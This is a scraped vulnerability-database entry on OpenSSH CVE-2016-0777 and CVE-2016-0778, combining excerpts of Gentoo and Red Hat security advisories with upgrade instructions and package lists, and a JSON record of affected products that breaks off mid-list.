1 net-misc/openssh < 7.1_p2 >= 7.1_p2

Description

Qualys have reported two issues in the "roaming" code included in the OpenSSH client, which provides undocumented, experimental support for resuming SSH connections. Users with private keys that are not protected by a passphrase are advised to generate new keys if they have connected to an SSH server they don't fully trust. To do so, add "UseRoaming no" to the SSH client configuration, or specify "-o 'UseRoaming no'" on the command line.

Resolution

All OpenSSH users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.1_p2"

References

[ 1 ] CVE-2016-0777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0777 [ 2 ] CVE-2016-0778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0778

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201601-01

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Moderate: openssh security update Advisory ID: RHSA-2016:0043-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-0043.html Issue date: 2016-01-14 CVE Names: CVE-2016-0777 CVE-2016-0778 =====================================================================

Summary:

Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7.

Description:

OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. (CVE-2016-0778)

Red Hat would like to thank Qualys for reporting these issues.

All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: openssh-6.6.1p1-23.el7_2.src.rpm

x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: openssh-6.6.1p1-23.el7_2.src.rpm

x86_64: openssh-6.6.1p1-23.el7_2.x86_64.rpm openssh-clients-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-6.6.1p1-23.el7_2.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: openssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm openssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm openssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: openssh-6.6.1p1-23.el7_2.src.rpm

ppc64: openssh-6.6.1p1-23.el7_2.ppc64.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-6.6.1p1-23.el7_2.ppc64.rpm

ppc64le: openssh-6.6.1p1-23.el7_2.ppc64le.rpm openssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm openssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-6.6.1p1-23.el7_2.ppc64le.rpm

s390x: openssh-6.6.1p1-23.el7_2.s390x.rpm openssh-askpass-6.6.1p1-23.el7_2.s390x.rpm openssh-clients-6.6.1p1-23.el7_2.s390x.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-keycat-6.6.1p1-23.el7_2.s390x.rpm openssh-server-6.6.1p1-23.el7_2.s390x.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: openssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm openssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm

ppc64le: openssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm openssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm

s390x: openssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm openssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm openssh-ldap-6.6.1p1-23.el7_2.s390x.rpm openssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm pam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: openssh-6.6.1p1-23.el7_2.src.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2016-0777 https://access.redhat.com/security/cve/CVE-2016-0778 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/articles/2123781

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo nXgYWs8cZcyoTRVoriTGHQo= =1sk9 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0030",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "unified threat management software",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sophos",
        "version": "9.353"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.11.0"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.7"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.1"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.6"
      },
      {
        "model": "mac os x",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.11.3"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "5.6"
      },
      {
        "model": "virtual customer access system",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "hp",
        "version": "15.07"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.8"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.0"
      },
      {
        "model": "mac os x",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.10.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "5.8"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.2"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.3"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "7.0"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "5.4"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "5.9"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "5.7"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "7.1"
      },
      {
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.9.0"
      },
      {
        "model": "mac os x",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.9.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "5.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.9"
      },
      {
        "model": "mac os x",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.10.0"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "6.4"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian gnu linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hardened bsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "openbsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "openssh",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "ubuntu",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openbsd",
        "version": "7.x"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.9.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openbsd",
        "version": "5.x"
      },
      {
        "model": "utm software",
        "scope": null,
        "trust": 0.8,
        "vendor": "sophos",
        "version": null
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openbsd",
        "version": "6.x"
      },
      {
        "model": "hpe remote device access: virtual customer access system",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openbsd",
        "version": "7.1p2"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.10.5"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.11 to  10.11.3"
      },
      {
        "model": "solaris",
        "scope": null,
        "trust": 0.8,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "nsmexpress",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.16"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1"
      },
      {
        "model": "junos 14.2r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "nsm3000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.4"
      },
      {
        "model": "junos 13.3r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.9.0.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.3"
      },
      {
        "model": "purepower integrated manager service appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.3.0.0"
      },
      {
        "model": "junos 12.1x46-d35",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "purepower integrated manager kvm host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "pan-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.3"
      },
      {
        "model": "purview",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "7.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.5"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0"
      },
      {
        "model": "junos 15.1x49-d40",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.17"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.5"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.10"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.18"
      },
      {
        "model": "ids/ips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.50"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.1"
      },
      {
        "model": "junos 13.3r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7"
      },
      {
        "model": "junos 15.1x49-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x46-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.8"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.2"
      },
      {
        "model": "linux x86 64 -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "nac appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "7.0.3"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "junos 14.1r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.10"
      },
      {
        "model": "junos 12.1x46-d45",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.14"
      },
      {
        "model": "junos 13.3r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 15.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "6.2p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssh",
        "version": null
      },
      {
        "model": "junos 12.1x47-d11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "purepower integrated manager vhmc appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0"
      },
      {
        "model": "junos 15.1x49-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.2"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4.0.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "junos 15.1f3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "16.1.2"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.8"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.8"
      },
      {
        "model": "netsight appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.3.0.179"
      },
      {
        "model": "extremexos patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.38"
      },
      {
        "model": "junos 15.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 15.1f2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "5.0"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "junos 12.3r11",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.5"
      },
      {
        "model": "junos 15.1x49-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "netsight appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "5.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.4"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.6"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.2"
      },
      {
        "model": "junos 14.1r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.3"
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.70"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "5.7"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.4.0"
      },
      {
        "model": "5.6p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssh",
        "version": null
      },
      {
        "model": "nsm4000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "junos 13.3r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x47-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "netsight appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.0"
      },
      {
        "model": "junos 14.1r7",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "virtual customer access system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "14.06"
      },
      {
        "model": "junos 12.1x46-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "16.2"
      },
      {
        "model": "linux -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.5"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.15"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2.0.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "junos 12.1x47-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "nac appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.3.0.179"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.4"
      },
      {
        "model": "opensuse evergreen",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "5.8"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1.0"
      },
      {
        "model": "junos 14.1r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "15.10"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "virtual customer access system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "15.07"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "identifi wireless",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "10.11"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.0"
      },
      {
        "model": "7.1p2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssh",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.4"
      },
      {
        "model": "junos 12.3x48-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.3x48-d15",
        "scope": null,
